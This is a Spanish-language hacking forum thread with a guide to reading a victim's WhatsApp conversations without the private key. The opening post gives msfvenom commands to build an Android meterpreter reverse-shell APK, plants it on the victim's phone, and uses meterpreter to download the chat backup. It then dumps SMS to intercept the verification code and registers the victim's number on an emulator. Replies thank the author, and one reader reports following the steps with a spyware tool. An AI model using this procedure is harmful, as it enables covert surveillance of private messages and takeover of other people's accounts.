Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[GUIA] Descifrar backups de WhatsApp sin necesidad de clave privada.

  • 14 Respuestas
  • 35101 Vistas

0 Usuarios y 32 Visitantes están viendo este tema.

Desconectado Eryos

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: sergyvegas
« en: Agosto 26, 2017, 12:40:34 pm »
                                                                                                                                   
¿Es tan seguro whatsapp como dicen?
En este tema voy a explicar como es posible que alguien que tenga acceso a un dispositivo puede descifrar los backups de WhastApp sin necesidad de la clave privada. Antes que nada voy a explicar brevemente unos datos a tener en cuenta:

Cada día, WhatsApp automáticamente guarda tu historial de chats en la memoria de tu teléfono o en una tarjeta de memoria, dependiendo de tus configuraciones, estas sirven para en un momento dado recuperar las conversaciones. Estas crean un archivo con el formato msgstore-AAAA-MM-DD.1.db.crypt12 este esta encriptado mediante una clave, esta clave se genera cada vez que instalamos WhatsApp por lo que solo podremos utilizar esa clave para descifrar los backups creados con ella.

Chat de la víctima con una persona.



Comenzamos:

Antes de nada, esto esta hecho con fines éticos, no me hago responsable del mal uso de esta guía.

Primero vamos a crear un payload con msfvenom para crear un backdoor en el dispositivo de la víctima.
Código: [Seleccionar]
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=Puerto R > nombre.apk
Ahora vamos a utilizar metasploit framework, ejecutamos:
Código: [Seleccionar]
msfconsole
Ahora configuramos metasploit con nuestros datos para poder escuchar la petición del payload para conectarnos a la víctima.




Instalamos el payload en el dispositivo android y una vez abierto aparecerá la sesión a la cual nos conectaremos.


Código: [Seleccionar]
session -i 1

Una vez dentro del dispositivo de la víctima, vamos a ir al directorio de WhatsApp, yo por defecto lo tengo ubicado en la sdcard.




Descargamos la ultima copia, recordad se puede usar cualquiera siempre y cuando se renombre una vez descargada a "msgstore.db.crypt12".


Código: [Seleccionar]
download msgstore.db.crypt12

Muy bien, ya tenemos la base de datos y acceso al dispositivo de la víctima, solo nos queda descifrar esa base de datos, el si el dispositivo de la víctima tiene permisos root, nos podemos saltar todo este paso hasta donde explico como obtener la clave privada.

Utilizamos un segundo dispositivo en el que instalaremos WhatsApp, en mi caso utilizaré un emulador de android cual tiene permisos de root para luego importar la copia de seguridad :)
Ahora, pasamos la base de datos a vuestro dispositivo a la carpeta Databases, esta esta dentro de la carpeta WhatsApp. (Si no aparece se crea)




Muy bien, ahora abrimos WhatsApp introducimos el numero de la victima, esto hará que le llegue un mensaje a la vicitma. (Problema: La victima se puede dar cuenta del mensaje recibido, pero, ¿Que pasa si la victima no esta atento al dispositivo en ese momento?)




Volvemos al metasploit, descargamos los sms y lo abrimos con un editor de texto, yo utilizaré nano.
Código: [Seleccionar]
dump_sms


Ya tenemos el código de verificación. Ahora solo queda restaurar. :)






Una vez terminado de restaurar, esperamos a que nos salga los chats de WhatsApp y importante desconectar el Wifi para evitar que la victima restablezca el WhatsApp y nos corten la conexión con el servidor, ya que no se puede utilizar una cuenta en mas de un dispositivo.




Bueno, ya tenemos las conversaciones pero ahora las queremos importar para guardarlas.
Vamos a hacer una copia de seguridad con WhatApp para encriptar de nuevo esas conversaciones con la clave que se ha generado al instalar WhatsApp.




Ahora, localizamos la clave (esta se encuentra en "/data/data/com.whatsapp/files") y la nueva copia de seguridad creada.





Muy bien, ya está todo solo nos queda abrir la base de datos con WhastApp Viewer https://github.com/andreas-mausch/whatsapp-viewer/releases



Esto generará una base de datos la cual la volveremos abrir con WhatsApp Viewer



y ya esta!! Ya tendríamos las conversaciones de WhastApp de la víctima.




Un saludo, Eryos.














« Última modificación: Agosto 26, 2017, 12:45:55 pm por Eryos »

Desconectado cerocool

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Agosto 26, 2017, 12:47:28 pm »
Que buen aporte, muy interesante todo lo que se puede hacer con una solo copia de seguridad del programa, ahora entiendo porque los forenses saben todo lo que uno hace con los teléfonos.

Desconectado GreyCod3

  • *
  • Underc0der
  • Mensajes: 13
  • Actividad:
    0%
  • Reputación -1
  • Knowledge is free
    • Ver Perfil
    • greycod3.blogspot.co.uk
« Respuesta #2 en: Agosto 26, 2017, 02:00:06 pm »
Buena bro, una manera simple para no romperse la cabeza a la hora de conseguir el KEY sin root.

Desconectado Flame

  • *
  • Underc0der
  • Mensajes: 23
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Agosto 26, 2017, 04:06:27 pm »
Una forma muy creativa de descifrar esa bd, en hora buena!.
Regards...

Desconectado Sesenabo

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 1
  • RSS.exe
    • Ver Perfil
« Respuesta #4 en: Agosto 26, 2017, 05:47:18 pm »
1+ para los forenses muchas gracias bro por la información.

Desconectado Akrapal

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Agosto 27, 2017, 05:18:49 am »
una pregunta, que pasaría si le pones un mail para recibir copia de los mensajes antes? probaste?

Desconectado Eryos

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: sergyvegas
« Respuesta #6 en: Agosto 27, 2017, 08:29:31 am »
una pregunta, que pasaría si le pones un mail para recibir copia de los mensajes antes? probaste?

¿A que mensajes te refieres? Sms de verificación de WhatsApp, o los mensajes de las conversaciones.

Desconectado salteadorNeo

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #7 en: Agosto 27, 2017, 11:53:19 am »
Esta guia esta sacada de
Código: [Seleccionar]
http://www.elladodelmal.com/2017/08/aprende-como-descifrar-los-mensajes-de.html a ver si ponemos los creditos de quien lo ha echo...
« Última modificación: Agosto 27, 2017, 05:53:08 pm por xyz »

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1919
  • Actividad:
    3.33%
  • Reputación 15
    • Ver Perfil
« Respuesta #8 en: Agosto 27, 2017, 12:30:24 pm »
Esta guia esta sacada de http://www.elladodelmal.com/2017/08/aprende-como-descifrar-los-mensajes-de.html a ver si ponemos los creditos de quien lo ha echo...

Sabes leer el autor? El autor es @Eyros y es quien lo escribió aquí...

Por tanto ha sido al revés ;)

Un saludo.



Desconectado Eryos

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: sergyvegas
« Respuesta #9 en: Agosto 27, 2017, 12:46:12 pm »
Esta guia esta sacada de http://www.elladodelmal.com/2017/08/aprende-como-descifrar-los-mensajes-de.html a ver si ponemos los creditos de quien lo ha echo...

salteadorNeo, te comento, yo soy el autor de este post y este fue primer lugar de publicación, este fue modificado para postearlo en la web que has mencionado, esto se llevó acabo con mi permiso.
Un saludo, Eryos.
« Última modificación: Agosto 27, 2017, 12:47:51 pm por Eryos »

Desconectado Akrapal

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #10 en: Agosto 27, 2017, 08:02:31 pm »
una pregunta, que pasaría si le pones un mail para recibir copia de los mensajes antes? probaste?

¿A que mensajes te refieres? Sms de verificación de WhatsApp, o los mensajes de las conversaciones.

ah discúlpame, pensé que whassap tenia una opción de mandar una copia de seguridad de los mensajes y leerlos desde un mail por ejemplo pero no era así

Desconectado pruebapepe

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #11 en: Abril 19, 2018, 11:32:23 am »
Buenas,

Tengo una duda haber si me podéis ayudar. Tengo las BBDD del whatsapp de un dispositivo, pero borraron la app del whatsapp por lo que no tengo acceso a la Key para desencriptarlas. Hay alguna forma de desencriptarlas si necesidad de Key y sin que hagas la parte final de la guía, en la que se pone el número de teléfono y se introduce el código que le llega al terminal?

Muchas gracias de antemano.

Un saludo.

Desconectado Geco

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #12 en: Mayo 12, 2018, 08:23:30 pm »
Hola segui todos los pasos ya tengo la copia se seguridad de la primera base de datos pero necesito la key y no la encuentro en la simulacion del android tampoco la carpeta FILE adjunto la imagen alguien me podria decir como encontrarla o que paso estoy haciendo mal.

https://ibb.co/fAfFfd

 Un saludo


Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1919
  • Actividad:
    3.33%
  • Reputación 15
    • Ver Perfil
« Respuesta #13 en: Mayo 13, 2018, 12:14:21 pm »
Hola segui todos los pasos ya tengo la copia se seguridad de la primera base de datos pero necesito la key y no la encuentro en la simulacion del android tampoco la carpeta FILE adjunto la imagen alguien me podria decir como encontrarla o que paso estoy haciendo mal.

https://ibb.co/fAfFfd

 Un saludo

Hola @Geco,

En tu imagen buscas en sdcard, sin embargo la key está en la ruta "/data/data/com.whatsapp/files"

Un saludo.



Desconectado Geco

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #14 en: Mayo 13, 2018, 01:56:03 pm »
Hola ya pude solucionarlo a los que están haciendo este proceso no les recomiendo buscar la key en la aplicación "ES FILE EXPLORER" yo lo ice pero no aparece allí. Tienen que buscarlo en la aplicación "FILE MANAGER" parece que allí.

https://ibb.co/dRs8kd
https://ibb.co/m7OsBJ

Pero a un tengo el problema de que el spynote deja de reconocer mi movil y tengo que reiniciar mi movil para que lo vuelva a reconocer. Nose si alguien sabe como solucionar ese problema.

 

¿Te gustó el post? COMPARTILO!



Sniffers para Whatsapp y Tuenti Chat

Iniciado por Stiuvert

Respuestas: 11
Vistas: 8174
Último mensaje Septiembre 10, 2012, 06:54:33 pm
por Stiuvert
QRLJacking: hackeando el código QR de WhatsApp y otros

Iniciado por Gabriela

Respuestas: 0
Vistas: 4459
Último mensaje Agosto 02, 2016, 03:08:24 pm
por Gabriela
PoC: Captura conexiones de WhatsApp de cualquier contacto

Iniciado por qwartz

Respuestas: 1
Vistas: 1649
Último mensaje Junio 17, 2019, 05:31:04 am
por abelduran1
QRLJacking - Robando sesión de WhatsApp por Codigo QR

Iniciado por BrowserNet

Respuestas: 5
Vistas: 4636
Último mensaje Enero 05, 2017, 12:28:34 pm
por zoro248
Propagación de Malware en Android a través de Whatsapp

Iniciado por rollth

Respuestas: 5
Vistas: 6476
Último mensaje Febrero 02, 2018, 02:12:37 pm
por Nobody